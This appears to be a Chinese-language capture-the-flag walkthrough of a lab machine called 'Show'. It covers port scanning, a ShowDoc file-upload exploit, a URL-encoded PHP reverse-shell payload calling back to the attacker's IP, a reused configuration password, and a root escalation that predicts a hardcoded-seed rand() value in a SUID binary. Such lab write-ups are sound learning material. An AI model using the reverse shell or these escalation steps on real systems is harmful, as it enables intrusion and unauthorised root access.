Show 测试

信息搜集

192.168.100.60

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# rustscan -a 192.168.100.60 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.60:22
Open 192.168.100.60:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.100.60
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-27 14:35 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
Initiating ARP Ping Scan at 14:35
Scanning 192.168.100.60 [1 port]
Completed ARP Ping Scan at 14:35, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:35
Completed Parallel DNS resolution of 1 host. at 14:35, 4.00s elapsed
DNS resolution of 1 IPs took 4.00s. Mode: Async [#: 2, OK: 0, NX: 0, DR: 1, SF: 0, TR: 4, CN: 0]
Initiating SYN Stealth Scan at 14:35
Scanning 192.168.100.60 [2 ports]
Discovered open port 80/tcp on 192.168.100.60
Discovered open port 22/tcp on 192.168.100.60
Completed SYN Stealth Scan at 14:35, 0.02s elapsed (2 total ports)
Initiating Service scan at 14:35
Scanning 2 services on 192.168.100.60
Completed Service scan at 14:35, 6.08s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.100.60
NSE: Script scanning 192.168.100.60.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.35s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
Nmap scan report for 192.168.100.60
Host is up, received arp-response (0.00070s latency).
Scanned at 2026-04-27 14:35:29 CST for 7s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Debian 7+deb13u1 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.66 ((Debian))
|_http-favicon: Unknown favicon MD5: 1FBC02DC6F980F075779049BF687128A
| http-title: ShowDoc
|_Requested resource was ./web/#/
|_http-server-header: Apache/2.4.66 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 08:00:27:92:1C:00 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=4/27%OT=22%CT=%CU=37168%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=69EF03B8%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=2%ISR=110%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 11.268 days (since Thu Apr 16 08:09:49 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.100.60

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.10 seconds
Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)

  • 80 web
  • 22 ssh

web是一个ShowDoc,这里使用wavely扫描出了漏洞

image

https://github.com/SexyBeast233/SecBooks/blob/main/%E3%80%90%E6%96%87%E5%BA%93%E3%80%91peiqi%E6%96%87%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/ShowDoc/ShowDoc%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md

image

image

反弹shell

1
test=%24sock%3Dfsockopen%28%22192.168.100.49%22%2C7777%29%3B%24proc%3Dproc_open%28%22%2Fbin%2Fsh%22%2Carray%280%3D%3E%24sock%2C1%3D%3E%24sock%2C2%3D%3E%24sock%29%2C%24pipes%29%3B

image

提权

横向移动到l1qin9

在/var/www/html/server里面又发现了一个thinkphp的cms当时想着是不是运行这个thinkphp的不是www用户从而利用这个thinkphp来提权,但发现依旧是www用户。翻了翻发现在/var/www/html下很多配置文件在经过查找最终锁定/var/www/html/server/Application/Common/Conf/config.php

image

image

showdoc123456存在密码复用是l1qin9 mooi的密码

1
2
3
4
5
www-data@Show:~/html$ su l1qin9
Password:
l1qin9@Show:/var/www/html$ id
uid=1001(l1qin9) gid=1001(l1qin9) groups=1001(l1qin9),100(users)
l1qin9@Show:/var/www/html$

l1qin9 -> root

image

在家目录下有个SUID权限的执行文件,get下来使用ida分析

1
2
3
4
5
6
7
8
9
10
l1qin9@Show:~$ scp auth_monitor root@192.168.100.49:/tmp/aaaa
The authenticity of host '192.168.100.49 (192.168.100.49)' can't be established.
ED25519 key fingerprint is SHA256:ZyUbPteDlhKgfFR102PGhJUWNS++vR62HchhPFY2Cfw.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.49' (ED25519) to the list of known hosts.
root@192.168.100.49's password:
auth_monitor 100% 16KB 5.9MB/s 00:00
l1qin9@Show:~$

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
int __fastcall main(int argc, const char **argv, const char **envp)
{
int v3; // ebx
time_t v4; // rax
char s[256]; // [rsp+10h] [rbp-130h] BYREF
int v7; // [rsp+110h] [rbp-30h] BYREF
unsigned int buf; // [rsp+114h] [rbp-2Ch] BYREF
FILE *stream; // [rsp+118h] [rbp-28h]
int v10; // [rsp+120h] [rbp-20h]
int fd; // [rsp+124h] [rbp-1Ch]
int i; // [rsp+128h] [rbp-18h]
unsigned int v13; // [rsp+12Ch] [rbp-14h]

fd = open("/dev/urandom", 0, envp);
if ( fd < 0 )
{
v3 = time(0LL);
buf = v3 ^ getpid();
}
else
{
read(fd, &buf, 4uLL);
close(fd);
}
v13 = 0;
for ( i = 0; i <= 99; ++i )
{
v13 += buf % (i + 1);
v13 ^= **argv;
}
s0rand(v13);
v10 = rand();
puts("--- MAZE-SEC ACCESS MONITOR ---");
v4 = time(0LL);
printf("SYSTEM_TICK: %ld\n", v4);
printf("CHALLENGE_STAMP: %08x\n", buf);
printf("ENTER ACCESS CODE: ");
if ( (unsigned int)__isoc99_scanf("%d", &v7) != 1 )
return 1;
if ( v10 == v7 )
{
setuid(0);
setgid(0);
stream = fopen("/root/show.txt", "r");
if ( stream )
{
while ( fgets(s, 256, stream) )
printf("%s", s);
fclose(stream);
}
}
else
{
puts("ACCESS DENIED.");
}
return 0;
}
1
2
3
4
void s0rand()
{
srand(0x539u);
}

程序模拟了要求用户输入正确的 “ACCESS CODE”。如果输入正确,程序将以 root 权限读取并显示 /root/show.txt

程序逻辑分析

A. 初始混淆(伪随机干扰)

程序开头试图获取一个高质量的随机数 buf

  1. 优先尝试读取 /dev/urandom
  2. 如果失败,则使用 time(0) ^ getpid() 作为替代方案。
  3. 随后,程序通过一个 100 次的循环计算变量 v13​,其中涉及了 buf % (i + 1)​ 以及程序启动参数 **argv 的异或运算。

分析结论: 这一部分逻辑看起来非常复杂,试图让用户相信 v13 是一个不可预测的动态值。

B. 核心漏洞:伪函数调用

这是程序最关键的逻辑陷阱:

1
2
3
v13 = [复杂计算...];
s0rand(v13); // 这里调用了 s0rand
v10 = rand(); // 获取第一个随机数

观察程序义的 s0rand 函数:

1
2
3
4
void s0rand()
{
srand(0x539u);
}
  • 参数忽略: 虽然 main​ 函数向 s0rand​ 传递了 v13​,但 s0rand​ 的函数定义中​根本没有接收参数
  • 硬编码种子: 无论 v13​ 是多少,s0rand​ 每次运行都会执行 srand(0x539u)
  • 0x539 的十进制值是 ​1337

由于 srand()​ 的种子(Seed)被固定为 1337​,根据 C 语言标准库的伪随机数生成算法,rand()​ 产生的第一个数值是确定且唯一的。

使用 Python 的 ctypes​ 模块直接调用系统底层的 libc.so.6 库生产

1
python3 -c "import ctypes; libc = ctypes.CDLL('libc.so.6'); libc.srand(1337); print(libc.rand())"

image